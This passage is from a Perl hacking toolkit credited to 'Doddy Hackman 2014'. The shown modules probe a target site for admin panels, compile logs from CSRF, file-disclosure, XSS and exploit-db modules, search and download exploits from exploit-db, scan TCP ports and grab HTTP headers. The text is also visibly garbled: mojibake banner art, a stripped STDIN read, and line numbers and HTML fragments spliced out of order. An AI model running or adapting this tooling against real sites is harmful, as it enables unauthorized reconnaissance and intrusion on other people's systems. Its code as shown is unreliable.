¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ 1475 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ 1476 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ 1477 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ 1478 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ 1479 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ 1480 | \t\t ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾ 1481 | \t\t ¾¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾ 1482 | \t\t ¾¾¾ ¾¾¾ ¾¾¾ ¾¾¾ 1483 | \t\t ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾ ¾¾¾¾ 1484 | \t\t ¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾ 1485 | \t\t ¾¾¾¾¾¾¾¾¾ ¾ ¾¾¾¾¾¾¾¾¾ 1486 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ 1487 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾ 1488 | \t\t ¾ ¾¾¾¾¾¾¾¾¾¾ ¾ 1489 | \t\t ¾ ¾ ¾¾¾¾ ¾ ¾ 1490 | \t\t ¾ ¾¾ ¾¾ 1491 | \t\t ¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ 1492 | \t\t ¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾ 1493 | \t\t ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾ 1494 | \t\t ¾¾¾¾¾¾¾¾¾¾ ¾¾¾ ¾¾¾¾¾¾¾¾¾ 1495 | \t\t ¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ 1496 | \t\t ¾¾¾¾¾¾ ¾¾¾¾¾¾¾ 1497 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾ 1498 | \t\t ¾¾¾¾¾¾¾¾¾ 1499 | \t\t ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾ 1500 | \t\t ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾ 1501 | \t\t ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾ 1502 | \t\t ¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾ 1503 | \t\t ¾¾¾¾¾¾ ¾¾¾¾¾¾ 1504 | \t\t ¾¾¾¾ ¾¾¾¾ 1505 | 1506 | 1507 | 1508 | 1509 | 1510 | ", "logos", "7", "5" ); 1511 | 1512 | } 1513 | 1514 | } 1515 | 1516 | sub printear { # 1517 | my $test; 1518 | my $efecto; 1519 | my $word = getdatanownownownow(); 1520 | 1521 | if ( $word =~ /colors=(.*)/ ) { 1522 | $test = $1; 1523 | } 1524 | 1525 | if ( $word =~ /efect=(.*)/ ) { 1526 | $efecto = $1; 1527 | } 1528 | 1529 | if ( $test eq "y" ) { 1530 | if ( $_[1] eq "text" ) { 1531 | 1532 | if ( $efecto =~ /y/ ) { 1533 | texto_raro( "\x03" . $_[2] . $_[0] . "\x030" ); 1534 | } 1535 | else { 1536 | cprint( "\x03" . $_[2] . $_[0] . "\x030" ); 1537 | } 1538 | } 1539 | elsif ( $_[1] eq "logos" ) { 1540 | cprint( "\x03" . $_[2] . $_[0] . "\x030" ); 1541 | } 1542 | elsif ( $_[1] eq "stdin" ) { 1543 | if ( $_[3] ne "" ) { 1544 | cprint( "\x03" . $_[2] . $_[0] . "\x030" . "\x03" . $_[3] ); 1545 | my $op = ; 1546 | chomp $op; 1547 | cprint("\x030"); 1548 | return $op; 1549 | } 1550 | } 1551 | else { 1552 | print "error\n"; 1553 | } 1554 | } 1555 | else { 1556 | 1557 | # 1558 | if ( $_[1] eq "text" ) { 1559 | 1560 | if ( $efecto =~ /y/ ) { 1561 | texto_raro( $_[0] ); 1562 | } 1563 | else { 1564 | print( $_[0] ); 1565 | } 1566 | } 1567 | 1568 | elsif ( $_[1] eq "logos" ) { 1569 | print( $_[0] ); 1570 | } 1571 | 1572 | elsif ( $_[1] eq "stdin" ) { 1573 | if ( $_[3] ne "" ) { 1574 | if ( $efecto =~ /y/ ) { 1575 | texto_raro( $_[0] ); 1576 | } 1577 | else { 1578 | cprint( $_[0] ); 1579 | } 1580 | my $op = ; 1581 | chomp $op; 1582 | return $op; 1583 | } 1584 | } 1585 | else { 1586 | print "error\n"; 1587 | } 1588 | } 1589 | } #Fin de printear 1590 | 1591 | sub texto_raro { 1592 | my @letras = split //, $_[0]; 1593 | for (@letras) { 1594 | usleep(40_000); 1595 | print $_; 1596 | } 1597 | } 1598 | 1599 | sub clean { 1600 | my $os = $^O; 1601 | if ( $os =~ /Win32/ig ) { 1602 | system("cls"); 1603 | } 1604 | else { 1605 | system("clear"); 1606 | } 1607 | } 1608 | 1609 | sub copyright_menu { 1610 | printear( "\n\n\t\t\t(C) Doddy Hackman 2014\n\n", "text", "11", "5" ); 1611 | exit(1); 1612 | } 1613 | 1614 | ##Funciones del programa ## 1615 | 1616 | sub start_panel { 1617 | 1618 | head_panel(); 1619 | my $page = printear( "[+] Page : ", "stdin", "11", "13" ); 1620 | 1621 | if ( $page eq "exit" ) { 1622 | estoydentroporahora(); 1623 | } 1624 | 1625 | my $count = printear( "\n[+] Count : ", "stdin", "11", "13" ); 1626 | 1627 | if ( $count eq "" ) { 1628 | $count = 3; 1629 | } 1630 | 1631 | scan_panel( $page, $count ); 1632 | adios(); 1633 | 1634 | } 1635 | 1636 | sub scan_panel { 1637 | 1638 | my $web = $_[0]; 1639 | 1640 | my ( $scheme, $auth, $path, $query, $frag ) = uri_split($web); 1641 | 1642 | my $web = $scheme . "://" . $auth; 1643 | 1644 | my $count = 0; 1645 | 1646 | printear( "\n[+] Searching .....\n\n", "text", "13", "5" ); 1647 | 1648 | for my $path (@paneles) { 1649 | 1650 | if ( $count eq $_[1] ) { 1651 | last; 1652 | } 1653 | 1654 | $code = tomados( $web . "/" . $path ); 1655 | 1656 | if ( $code->is_success ) { 1657 | $controlt = 1; 1658 | $count++; 1659 | printear( 1660 | "\a\a[Link] : " . $web . "/" . $path . "\n", "text", 1661 | "7", "5" 1662 | ); 1663 | 1664 | savefile( "admin_logs.txt", $web . "/" . $path ); 1665 | } 1666 | 1667 | } 1668 | 1669 | if ( $controlt ne 1 ) { 1670 | printear( "[-] Not found anything\n", "text", "5", "5" ); 1671 | } 1672 | 1673 | } ## 1674 | 1675 | sub head_panel { 1676 | printear( " 1677 | 1678 | 1679 | @ @@@@ @ @ @ @ @ @@@@@ @ @ @ @@@@ 1680 | @ @ @ @ @ @ @@ @ @ @ @@ @ @ @ 1681 | @ @ @ @ @@ @@ @ @@ @ @ @ @@ @ @ @ 1682 | @ @ @ @ @@ @@ @ @ @ @ @ @ @ @ @ @ @ 1683 | @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @ @ @ 1684 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ 1685 | @@@@@ @ @ @ @ @ @ @ @@ @ @ @ @@ @ @ 1686 | @ @ @ @ @ @ @ @ @ @@ @ @ @ @@ @ @ 1687 | @ @ @@@@ @ @ @ @ @ @ @ @ @ @@@@ 1688 | 1689 | 1690 | 1691 | ", "logos", "7", "5" ); 1692 | 1693 | } 1694 | 1695 | sub genlogs { 1696 | 1697 | my $cantidad = int(@files_gen); 1698 | my $control_entrada; 1699 | my $control_salida; 1700 | my $contenido; 1701 | my $nuevo_nombre; 1702 | 1703 | for my $file (@files_chau_gen) { 1704 | unlink( getcwd() . "/logs_html/" . $file ); 1705 | } 1706 | 1707 | for my $contador ( 0 .. $cantidad - 1 ) { 1708 | 1709 | $control_entrada = $files_gen[$contador]; 1710 | $control_salida = $files_chau_gen[$contador]; 1711 | 1712 | if ( $control_entrada eq "kobra" ) { 1713 | 1714 | borrar_archivos( getcwd() . "/" . "logs_html/webs/" ); 1715 | 1716 | opendir my ($listando), getcwd() . "/logs/webs/"; 1717 | my @archivos = readdir $listando; 1718 | closedir $listando; 1719 | 1720 | savefil( "logs_html/kobra.html", $comienzo_html ); 1721 | 1722 | savefil( "logs_html/kobra.html", 1723 | "" ); 1724 | 1725 | for my $archivo (@archivos) { 1726 | 1727 | if ( -f getcwd() . "/logs/webs/" . $archivo ) { 1728 | 1729 | $nuevo_nombre = $archivo; 1730 | $nuevo_nombre =~ s/.txt/.html/ig; 1731 | 1732 | savefil( "logs_html/kobra.html", 1733 | "" ); 1738 | 1739 | $contenido = 1740 | savewords( getcwd() . "/logs/webs/" . $archivo ); 1741 | $contenido =~ s/\n/
/ig; 1742 | 1743 | savefil( "logs_html/webs/" . $nuevo_nombre, 1744 | $comienzo_html ); 1745 | savefil( "logs_html/webs/" . $nuevo_nombre, "
" ); 1746 | savefil( "logs_html/webs/" . $nuevo_nombre, $contenido ); 1747 | savefil( "logs_html/webs/" . $nuevo_nombre, "
" ); 1748 | savefil( "logs_html/webs/" . $nuevo_nombre, $final_html ); 1749 | 1750 | } 1751 | } 1752 | savefil( "logs_html/kobra.html", "
Logs
" 1734 | . "" 1736 | . $archivo . "" 1737 | . "
" ); 1753 | savefil( "logs_html/kobra.html", $final_html ); 1754 | 1755 | } 1756 | elsif ( $control_entrada eq "csrf" ) { 1757 | 1758 | borrar_archivos( getcwd() . "/" . "logs_html/csrf/" ); 1759 | 1760 | opendir my ($listando), getcwd() . "/logs/csrf/"; 1761 | my @archivos = readdir $listando; 1762 | closedir $listando; 1763 | 1764 | savefil( "logs_html/csrf.html", $comienzo_html ); 1765 | savefil( "logs_html/csrf.html", 1766 | "" ); 1767 | 1768 | for my $archivo (@archivos) { 1769 | 1770 | if ( -f getcwd() . "/logs/csrf/" . $archivo ) { 1771 | 1772 | #print $archivo."\n"; 1773 | 1774 | $nuevo_nombre = $archivo; 1775 | $nuevo_nombre =~ s/.html/.txt/ig; 1776 | 1777 | savefil( "logs_html/csrf/" . $nuevo_nombre, 1778 | savewords( getcwd() . "/logs/csrf/" . $archivo ) ); 1779 | 1780 | savefil( "logs_html/csrf.html", 1781 | "" ); 1786 | 1787 | } 1788 | } 1789 | 1790 | savefil( "logs_html/csrf.html", "
Logs
" 1782 | . "" 1784 | . $nuevo_nombre . "" 1785 | . "
" ); 1791 | savefil( "logs_html/csrf.html", $final_html ); 1792 | 1793 | } 1794 | elsif ( $control_entrada eq "fsd" ) { 1795 | 1796 | borrar_archivos( getcwd() . "/" . "logs_html/fsdlogs/" ); 1797 | 1798 | opendir my ($listando), getcwd() . "/logs/fsdlogs/"; 1799 | my @archivos = readdir $listando; 1800 | closedir $listando; 1801 | 1802 | savefil( "logs_html/fsd.html", $comienzo_html ); 1803 | savefil( "logs_html/fsd.html", 1804 | "" ); 1805 | 1806 | for my $archivo (@archivos) { 1807 | 1808 | if ( -f getcwd() . "/logs/fsdlogs/" . $archivo ) { 1809 | 1810 | #print $archivo."\n"; 1811 | 1812 | $nuevo_nombre = $archivo; 1813 | $nuevo_nombre =~ s/.html/.txt/ig; 1814 | $nuevo_nombre =~ s/.php/.txt/ig; 1815 | 1816 | savefil( "logs_html/fsdlogs/" . $nuevo_nombre, 1817 | savewords( getcwd() . "/logs/fsdlogs/" . $archivo ) ); 1818 | 1819 | savefil( "logs_html/fsd.html", 1820 | "" ); 1825 | } 1826 | } 1827 | 1828 | } 1829 | 1830 | elsif ( $control_entrada eq "exploitdb" ) { 1831 | 1832 | borrar_archivos( getcwd() . "/" . "logs_html/exploitdb/" ); 1833 | 1834 | opendir my ($listando), getcwd() . "/logs/exploitdb/"; 1835 | my @archivos = readdir $listando; 1836 | closedir $listando; 1837 | 1838 | savefil( "logs_html/exploitdb.html", $comienzo_html ); 1839 | 1840 | for my $archivo (@archivos) { 1841 | 1842 | my $dircon = getcwd() . "/logs/exploitdb/" . $archivo; 1843 | 1844 | if ( -d $dircon and $archivo ne "." and $archivo ne ".." ) { 1845 | 1846 | savefil( "logs_html/exploitdb.html", 1847 | "
Logs
" 1821 | . "" 1823 | . $nuevo_nombre . "" 1824 | . "
" ); 1850 | 1851 | #print "[+] Dir : ".$dircon."\n"; 1852 | 1853 | opendir my ($listando), $dircon; 1854 | my @archivosmas = readdir $listando; 1855 | closedir $listando; 1856 | 1857 | for my $archi (@archivosmas) { 1858 | if ( -f $dircon . "/" . $archi ) { 1859 | 1860 | ## yeah 1861 | savefil( "logs_html/exploitdb.html", 1862 | "" ); 1867 | 1868 | savefil( 1869 | "logs_html/exploitdb/" . $archi, 1870 | savewords( $dircon . "/" . $archi ) 1871 | ); 1872 | 1873 | #print "[+] File : ".$archi."\n"; 1874 | } 1875 | } 1876 | } 1877 | savefil( "logs_html/exploitdb.html", "
" 1848 | . $archivo 1849 | . "
" 1863 | . "" 1865 | . $archi . "" 1866 | . "

" ); 1878 | } 1879 | 1880 | savefil( "logs_html/exploitdb.html", $final_html ); 1881 | } 1882 | elsif ( $control_entrada eq "xss-logs.txt" ) { 1883 | 1884 | $contenido = savewords( "logs/" . $control_entrada ); 1885 | savefil( "logs_html/" . $control_salida, $comienzo_html ); 1886 | $contenido =~ s/\n/
/ig; 1887 | $contenido =~ s/\n", 1965 | "text", "13", "5" 1966 | ); 1967 | } 1968 | else { 1969 | printear( "\n[-] Write the string !\n", "text", "5", "5" ); 1970 | } 1971 | 1972 | adios(); 1973 | 1974 | } 1975 | elsif ( $op eq "3" ) { 1976 | 1977 | my $nueva = printear( "\n[+] String : ", "stdin", "11", "13" ); 1978 | 1979 | my $code = toma( "http://tinyurl.com/api-create.php?url=" . $nueva ); 1980 | 1981 | unless ( $code =~ /Error/ig ) { 1982 | printear( "\n[+] Link : " . $code . "\n", "text", "13", "5" ); 1983 | } 1984 | else { 1985 | printear( "\n[+] Error\n", "text", "5", "5" ); 1986 | } 1987 | adios(); 1988 | } 1989 | elsif ( $op eq "4" ) { 1990 | adios(); 1991 | } 1992 | else { 1993 | adios(); 1994 | } 1995 | } 1996 | 1997 | sub head_mysqlman { 1998 | printear( " 1999 | 2000 | 2001 | 2002 | @ @ @ @ @@@ @@@@ @ 2003 | @ @ @ @ @ @ @ @ @ 2004 | @@ @@ @ @ @ @ @ @ 2005 | @@ @@ @ @ @ @ @ @ 2006 | @ @ @ @ @ @@@ @ @ @ 2007 | @ @ @ @ @ @ @ @ @ 2008 | @ @ @ @ @ @ @ @ @ 2009 | @ @ @ @ @ @ @ @@ @ 2010 | @ @ @ @@@ @@@@ @@@@@ 2011 | @ 2012 | 2013 | 2014 | 2015 | ", "logos", "7", "5" ); 2016 | } 2017 | 2018 | sub mysqlman { 2019 | 2020 | clean(); 2021 | head_mysqlman(); 2022 | 2023 | my $host = printear( "[+] Hostname : ", "stdin", "11", "13" ); 2024 | my $user = printear( "\n[+] Username : ", "stdin", "11", "13" ); 2025 | my $pass = printear( "\n[+] Password : ", "stdin", "11", "13" ); 2026 | 2027 | ## 2028 | 2029 | printear( "\n[+] Connecting to the server\n", "text", "13", "5" ); 2030 | 2031 | $info = "dbi:mysql::" . $host . ":3306"; 2032 | if ( my $enter = DBI->connect( $info, $user, $pass, { PrintError => 0 } ) ) 2033 | { 2034 | 2035 | printear( "\n[+] Enter in the database\n", "text", "13", "5" ); 2036 | 2037 | while (1) { 2038 | 2039 | my $ac = printear( "\n[+] Query : ", "stdin", "11", "13" ); 2040 | 2041 | if ( $ac eq "exit" ) { 2042 | $enter->disconnect; 2043 | printear( "\n[+] Closing connection\n", "text", "5", "5" ); 2044 | adios(); 2045 | } 2046 | 2047 | $re = $enter->prepare($ac); 2048 | $re->execute(); 2049 | my $total = $re->rows(); 2050 | 2051 | my @columnas = @{ $re->{NAME} }; 2052 | 2053 | if ( $total eq "-1" ) { 2054 | printear( "\n[-] Query Error\n", "text", "5", "5" ); 2055 | next; 2056 | } 2057 | else { 2058 | printear( "\n[+] Result of the query\n", "text", "13", "5" ); 2059 | if ( $total eq 0 ) { 2060 | printear( "\n[+] Not rows returned\n", "text", "5", "5" ); 2061 | } 2062 | else { 2063 | printear( 2064 | "\n[+] Rows returned : " . $total . "\n\n", "text", 2065 | "13", "5" 2066 | ); 2067 | for (@columnas) { 2068 | printear( $_ . "\t\t", "text", "7", "5" ); 2069 | } 2070 | print "\n"; 2071 | while ( @row = $re->fetchrow_array ) { 2072 | for (@row) { 2073 | printear( $_ . "\t\t", "text", "7", "5" ); 2074 | } 2075 | print "\n"; 2076 | } 2077 | } 2078 | } 2079 | } 2080 | } 2081 | else { 2082 | print "\n[-] Error connecting\n"; 2083 | } 2084 | 2085 | ## 2086 | 2087 | adios(); 2088 | 2089 | } 2090 | 2091 | sub head_exploitdb { 2092 | printear( " 2093 | 2094 | 2095 | 2096 | @@@@@ @ @ @@@@@ @ @@@@ @ @@@@@ @@@@ @@@@ 2097 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ 2098 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ 2099 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ 2100 | @@@@ @ @@@@@ @ @ @ @ @ @ @ @@@@ 2101 | @ @ @ @ @ @ @ @ @ @ @ @ @ 2102 | @ @ @ @ @ @ @ @ @ @ @ @ @ 2103 | @ @ @ @ @ @ @ @ @ @ @ @ @ 2104 | @@@@@ @ @ @ @@@@@ @@@@ @ @ @@@@ @@@@ 2105 | 2106 | 2107 | 2108 | ", "logos", "7", "5" ); 2109 | } 2110 | 2111 | sub exploitdb { 2112 | 2113 | clean(); 2114 | head_exploitdb(); 2115 | 2116 | my $cosa = printear( "[+] String : ", "stdin", "11", "13" ); 2117 | 2118 | if ( $cosa eq "" ) { adios(); } 2119 | printear( "\n[+] Searching string\n", "text", "13", "5" ); 2120 | my %found = buscar($cosa); 2121 | $total = int( keys %found ) - 1; 2122 | printear( "\n[+] Exploits Found : " . $total . "\n\n", "text", "13", "5" ); 2123 | unless ( -d $cosa ) { 2124 | mkdir( "logs/exploitdb/" . $cosa, "0777" ); 2125 | } 2126 | for my $da ( keys %found ) { 2127 | my $tata = $da; 2128 | $tata =~ s/=//ig; 2129 | $tata =~ s/\(//ig; 2130 | $tata =~ s/\)//ig; 2131 | $tata =~ s/\///ig; 2132 | $tata =~ s/_//ig; 2133 | $tata =~ s/\new( 2174 | start_h => [ \&start, "tagname,attr" ], 2175 | text_h => [ \&text, "dtext" ], 2176 | ); 2177 | $test->parse( $_[0] ); 2178 | 2179 | sub start { 2180 | my ( $a, $b ) = @_; 2181 | my %e = %$b; 2182 | unless ( $a ne "a" ) { 2183 | $d = $e{href}; 2184 | $c = $a; 2185 | } 2186 | } 2187 | 2188 | sub text { 2189 | my $title = shift; 2190 | chomp $title; 2191 | unless ( $c ne "a" ) { 2192 | if ( $d =~ /www.exploit-db.com\/exploits\/(.*)/ ) { 2193 | my $id = $1; 2194 | my $url = "http://www.exploit-db.com/download/" . $id; 2195 | $links{$title} = $url; 2196 | } 2197 | $d = ""; 2198 | } 2199 | } 2200 | return %links; 2201 | } 2202 | 2203 | } 2204 | 2205 | sub head_encodedecode { 2206 | printear( " 2207 | 2208 | @@@@@ @ @ @@@@ @@@@ @@@@ @@@@@ @@@@@ 2209 | @ @@ @ @ @ @ @ @ @ @ @ @ 2210 | @ @@ @ @ @ @ @ @ @ @ @ 2211 | @ @ @ @ @ @ @ @ @ @ @ @ 2212 | @@@@ @ @ @ @ @ @ @ @ @@@@ @@@@@ 2213 | @ @ @ @ @ @ @ @ @ @ @ @ 2214 | @ @ @@ @ @ @ @ @ @ @ @ 2215 | @ @ @@ @ @ @ @ @ @ @ @ @ 2216 | @@@@@ @ @ @@@@ @@@@ @@@@ @@@@@ @ @ 2217 | 2218 | 2219 | ", "logos", "7", "5" ); 2220 | } 2221 | 2222 | sub encodedecode { 2223 | 2224 | clean(); 2225 | head_encodedecode(); 2226 | 2227 | printear( " 2228 | [++] Options 2229 | 2230 | [+] 1 : MD5 encoder 2231 | [+] 2 : base64 encoder 2232 | [+] 3 : base64 decoder 2233 | [+] 4 : ASCII encoder 2234 | [+] 5 : ASCII decoder 2235 | [+] 6 : HEX encoder 2236 | [+] 7 : HEX decoder 2237 | [+] 8 : URL encoder 2238 | [+] 9 : URL decoder 2239 | [+] 10 : Text to BIN 2240 | [+] 11 : BIN to Text 2241 | [+] 12 : Exit 2242 | 2243 | ", "text", "13", "5" ); 2244 | 2245 | my $op = printear( "[+] Option : ", "stdin", "11", "13" ); 2246 | 2247 | if ( $op eq "1" ) { 2248 | 2249 | my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" ); 2250 | printear( "\n[+] Result : " . md5_hex($texto) . "\n", 2251 | "text", "13", "5" ); 2252 | adios(); 2253 | 2254 | } 2255 | elsif ( $op eq "2" ) { 2256 | 2257 | my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" ); 2258 | printear( 2259 | "\n[+] Result : " . encode_base64($texto) . "\n", "text", 2260 | "13", "5" 2261 | ); 2262 | adios(); 2263 | 2264 | } 2265 | elsif ( $op eq "3" ) { 2266 | 2267 | my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" ); 2268 | printear( 2269 | "\n[+] Result : " . decode_base64($texto) . "\n", "text", 2270 | "13", "5" 2271 | ); 2272 | adios(); 2273 | 2274 | } 2275 | if ( $op eq "4" ) { 2276 | 2277 | my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" ); 2278 | printear( "\n[+] Result : " . ascii($texto) . "\n", "text", "13", "5" ); 2279 | adios(); 2280 | 2281 | } 2282 | elsif ( $op eq "5" ) { 2283 | 2284 | my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" ); 2285 | printear( 2286 | "\n[+] Result : " . ascii_de( $texto . "\n" ), "text", 2287 | "13", "5" 2288 | ); 2289 | adios(); 2290 | 2291 | } 2292 | elsif ( $op eq "6" ) { 2293 | 2294 | my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" ); 2295 | printear( "\n[+] Result : " . encode($texto) . "\n", "text", "13", 2296 | "5" ); 2297 | adios(); 2298 | 2299 | } 2300 | elsif ( $op eq "7" ) { 2301 | 2302 | my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" ); 2303 | printear( "\n[+] Result : " . decode($texto) . "\n", "text", "13", 2304 | "5" ); 2305 | adios(); 2306 | 2307 | } 2308 | elsif ( $op eq "8" ) { 2309 | 2310 | my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" ); 2311 | printear( 2312 | "\n[+] Result : " . uri_escape($texto) . "\n", "text", 2313 | "13", "5" 2314 | ); 2315 | adios(); 2316 | 2317 | } 2318 | elsif ( $op eq "9" ) { 2319 | 2320 | my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" ); 2321 | printear( 2322 | "\n[+] Result : " . uri_unescape($texto) . "\n", "text", 2323 | "13", "5" 2324 | ); 2325 | adios(); 2326 | 2327 | } 2328 | elsif ( $op eq "10" ) { 2329 | 2330 | my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" ); 2331 | printear( 2332 | "\n[+] Result : " . unpack( "B*", $texto ) . "\n", "text", 2333 | "13", "5" 2334 | ); 2335 | adios(); 2336 | 2337 | } 2338 | elsif ( $op eq "11" ) { 2339 | 2340 | my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" ); 2341 | printear( 2342 | "\n[+] Result : " . pack( "B*", $texto ) . "\n", "text", 2343 | "13", "5" 2344 | ); 2345 | adios(); 2346 | 2347 | } 2348 | elsif ( $op eq "12" ) { 2349 | adios(); 2350 | } 2351 | else { 2352 | adios(); 2353 | } 2354 | 2355 | } 2356 | 2357 | sub head_portscanner { 2358 | printear( " 2359 | 2360 | @@@@@ @@@@ @@@@@ @@@@@ @@@ @@@@ @ @ @ 2361 | @ @ @ @ @ @ @ @ @ @ @ @ @@ @ 2362 | @ @ @ @ @ @ @ @ @ @ @ @@ @ 2363 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ 2364 | @@@@@ @ @ @@@@@ @ @@@ @ @ @ @ @ @ 2365 | @ @ @ @ @ @ @ @ @ @ @ @ @ 2366 | @ @ @ @ @ @ @ @ @@@@@ @ @@ 2367 | @ @ @ @ @ @ @ @ @ @@ @ @ @@ 2368 | @ @@@@ @ @ @ @@@ @@@@ @ @ @ @ 2369 | 2370 | ", "logos", "7", "5" ); 2371 | 2372 | } 2373 | 2374 | sub portscanner { 2375 | 2376 | clean(); 2377 | head_portscanner(); 2378 | 2379 | printear( " 2380 | [++] Options 2381 | 2382 | [+] 1 : Simple Scan 2383 | [+] 2 : Full Scan 2384 | [+] 3 : Exit 2385 | 2386 | ", "text", "13", "5" ); 2387 | 2388 | my $op = printear( "[+] Option : ", "stdin", "11", "13" ); 2389 | 2390 | if ( $op eq "1" ) { 2391 | 2392 | my %ports = ( 2393 | "21" => "ftp", 2394 | "22" => "ssh", 2395 | "25" => "smtp", 2396 | "80" => "http", 2397 | "110" => "pop3", 2398 | "3306" => "mysql" 2399 | ); 2400 | 2401 | my $ip = printear( "\n[+] IP : ", "stdin", "11", "13" ); 2402 | 2403 | printear( "\n[+] Scanning $ip ...\n\n", "text", "13", "5" ); 2404 | 2405 | for my $port ( keys %ports ) { 2406 | 2407 | if ( 2408 | new IO::Socket::INET( 2409 | PeerAddr => $ip, 2410 | PeerPort => $port, 2411 | Proto => "tcp", 2412 | Timeout => 0.5 2413 | ) 2414 | ) 2415 | { 2416 | printear( 2417 | "[Port] : " 2418 | . $port 2419 | . " [Service] : " 2420 | . $ports{$port} . "\n", 2421 | "text", "7", "5" 2422 | ); 2423 | } 2424 | } 2425 | 2426 | printear( "\n[+] Finished\n", "text", "13", "5" ); 2427 | 2428 | adios(); 2429 | 2430 | } 2431 | 2432 | elsif ( $op eq "2" ) { 2433 | 2434 | my $ip = printear( "\n[+] IP : ", "stdin", "11", "13" ); 2435 | my $start = printear( "\n[+] Start Port : ", "stdin", "11", "13" ); 2436 | my $end = printear( "\n[+] End Port : ", "stdin", "11", "13" ); 2437 | 2438 | printear( "\n[+] Scanning $ip ...\n\n", "text", "13", "5" ); 2439 | 2440 | for my $port ( $start .. $end ) { 2441 | if ( 2442 | new IO::Socket::INET( 2443 | Timeout => 0.5, 2444 | PeerAddr => $ip, 2445 | PeerPort => $port, 2446 | Proto => "tcp", 2447 | Timeout => 0.5 2448 | ) 2449 | ) 2450 | { 2451 | printear( "[+] Port Found : " . $port . "\n", "text", "7", 2452 | "5" ); 2453 | } 2454 | } 2455 | printear( "\n[+] Scan Finished\n", "text", "13", "5" ); 2456 | 2457 | adios(); 2458 | } 2459 | 2460 | elsif ( $op eq "3" ) { 2461 | adios(); 2462 | } 2463 | else { 2464 | adios(); 2465 | } 2466 | 2467 | } 2468 | 2469 | sub head_httpfinger { 2470 | printear( " 2471 | 2472 | @ @ @@@@@ @@@@@ @@@@@ @@@@@ @ @ @ @@@@ @@@@@ @@@@@ 2473 | @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ 2474 | @ @ @ @ @ @ @ @ @@ @ @ @ @ @ 2475 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ 2476 | @@@@@@ @ @ @@@@@ @@@@ @ @ @ @ @ @@@ @@@@ @@@@@ 2477 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ 2478 | @ @ @ @ @ @ @ @ @@ @ @ @ @ @ 2479 | @ @ @ @ @ @ @ @ @@ @ @@ @ @ @ 2480 | @ @ @ @ @ @ @ @ @ @@@ @ @@@@@ @ @ 2481 | 2482 | ", "logos", "7", "5" ); 2483 | 2484 | } 2485 | 2486 | sub httpfinger { 2487 | 2488 | clean(); 2489 | head_httpfinger(); 2490 | 2491 | printear( " 2492 | [++] Options 2493 | 2494 | [+] 1 : Simple Scan 2495 | [+] 2 : Full Scan 2496 | [+] 3 : Exit 2497 | 2498 | ", "text", "13", "5" ); 2499 | 2500 | my $op = printear( "[+] Option : ", "stdin", "11", "13" ); 2501 | 2502 | if ( $op eq "1" ) { 2503 | 2504 | my $page = printear( "\n[+] Page : ", "stdin", "11", "13" ); 2505 | 2506 | printear( "\n[+] Getting Data ...\n", "text", "13", "5" ); 2507 | 2508 | my $code = $nave->get($page); 2509 | 2510 | printear( "\n[+] Date : " . $code->header('date'), "text", "13", "5" ); 2511 | printear( "\n[+] Server : " . $code->header('server'), 2512 | "text", "13", "5" ); 2513 | printear( "\n[+] Connection : " . $code->header('connection'), 2514 | "text", "13", "5" ); 2515 | printear( "\n[+] Content-Type : " . $code->header('content-type'), 2516 | "text", "13", "5" ); 2517 | 2518 | printear( "\n\n[+] Finished\n", "text", "13", "5" ); 2519 | 2520 | adios(); 2521 | 2522 | } 2523 | elsif ( $op eq "2" ) { 2524 | 2525 | my $page = printear( "\n[+] Page : ", "stdin", "11", "13" ); 2526 | 2527 | printear( "\n[+] Getting Data ...\n", "text", "13", "5" ); 2528 | 2529 | my $code = $nave->get($page); 2530 | 2531 | printear( "\n" . $code->headers()->as_string(), "text", "13", "5" ); 2532 | 2533 | printear( "\n[+] Finished\n", "text", "13", "5" ); 2534 | 2535 | adios(); 2536 | 2537 | } 2538 | elsif ( $op eq "3" ) { 2539 | } 2540 | else { 2541 | adios(); 2542 | } 2543 | 2544 | } 2545 | 2546 